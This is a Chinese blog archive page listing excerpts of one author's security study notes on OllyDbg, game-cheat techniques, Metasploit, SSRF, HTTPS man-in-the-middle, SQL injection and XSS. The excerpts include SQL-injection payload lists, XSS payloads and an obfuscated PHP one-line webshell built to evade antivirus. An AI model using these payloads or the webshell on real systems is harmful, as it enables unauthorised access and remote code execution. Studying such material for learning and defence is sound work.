上一页 1 ··· 13 14 15 16 17
2022年5月27日
通用寄存器.md
摘要: 通用寄存器 | 32Bits | 16Bits | 8Bits | | : | : | | | EAX | AX | AL | | ECX | CX | CL | | EDX | DX | DL | | EBX | BX | BL | | ESP | SP | AH | | EBP | BP | C 阅读全文
posted @ 2022-05-27 13:55 nsfoxer 阅读(26) 评论(0) 推荐(0)
小甲鱼.md
摘要: OD使用教程 基本使用 Q: 为什么我在Ollydbg中的第一个起始地址与其他人不同? (window7 64bit) 我的Ollydbg起始地址是777000000,77777777等。我认为这是系统地址。 A: 当你将PE加载到ollydbg时,按ALT + F9进入主模块的入口点(返回用户代码 阅读全文
posted @ 2022-05-27 13:55 nsfoxer 阅读(73) 评论(0) 推荐(0)
外挂方法.md
摘要: 外挂 动作模拟技术 鼠标模拟技术 键盘模拟技术 封包技术 挡截WinSock ​ Winsock是Windows网络编程接口,它工作于Windows应用层,它提供与底层传输协议无关的高层数据传输编程接口。在Windows系统中,使用WinSock接口为应用程序提供基于TCP/IP协议的网络访问服务, 阅读全文
posted @ 2022-05-27 13:51 nsfoxer 阅读(344) 评论(0) 推荐(0)
msfconsole.md
摘要: msfconsole 数据库 systemctl start postgresql.service db_status db_rebuild_cache#已停用 msfdb reinit db_connect db_disconnect db_nmap hosts services -S 445 c 阅读全文
posted @ 2022-05-27 13:50 nsfoxer 阅读(38) 评论(0) 推荐(0)
ssrf攻击概述.md
摘要: ssrf攻击概述 很多web应用都提供了从其他的服务器上获取数据的功能。使用用户指定的URL,web应用可以获取图片,下载文件,读取文件内容等。这个功能如果被恶意使用,可以利用存在缺陷的web应用作为代理攻击远程和本地的服务器。这种形式的攻击称为服务端请求伪造攻击(Server-side Reque 阅读全文
posted @ 2022-05-27 13:50 nsfoxer 阅读(137) 评论(0) 推荐(0)
https中间人攻击.md
摘要: https中间人攻击 使用tls/ssl方法进行加密传输 http攻击方法 降级攻击 解密攻击(明文,证书伪造) 协议漏洞,实现漏洞,配置不严格 openssl openssl s_client -connect www.baidu.com:443 **** sslscan 自动识别ssl配置错误, 阅读全文
posted @ 2022-05-27 13:49 nsfoxer 阅读(69) 评论(0) 推荐(0)
2022年5月26日
mysql手工注入.md
摘要: mysql手工注入 注释后面语句(引号闭合) 常用的注释payload or 1=1--+ 'or 1=1--+ "or 1=1--+ )or 1=1--+ ')or 1=1--+ ") or 1=1--+ "))or 1=1--+ 查询字段数目() 查询字段数目主要利用MySQL里面的 order 阅读全文
posted @ 2022-05-26 16:17 nsfoxer 阅读(12) 评论(0) 推荐(0)
一句话木马免杀.md
摘要: 一句话木马 php 方法 字符串变形: substr(string, start, length) <?php $a = 'a'.'s'.'s'.'e'.'r'.'t'; $a($_POST['x']); ?> <?php $a = substr('1a',1).'s'.'s'.'e'.'r'.'t 阅读全文
posted @ 2022-05-26 16:17 nsfoxer 阅读(110) 评论(0) 推荐(0)
sql注入整理.md
摘要: sql注入整理 ' or 1=1--+ ' or 1=1-- ' or 1=1# ' or 1='1 ' || 1='1 ' || 1=1--+ ')or('a'='a "or"="a'='a --> ??? 'or''=' 'or'='or' -->??? 1 or '1'='1'=1 -->?? 阅读全文
posted @ 2022-05-26 16:17 nsfoxer 阅读(13) 评论(0) 推荐(0)
xss.md
摘要: xss ​ cross-site-scripting ​ javascript 嵌入html <sctipt>alert("XSS");</script> 元素标签:<body onload=alert('XSS')> 图片:<img src="javascript:alert("XSS);"> 其 阅读全文
posted @ 2022-05-26 16:17 nsfoxer 阅读(18) 评论(0) 推荐(0)
上一页 1 ··· 13 14 15 16 17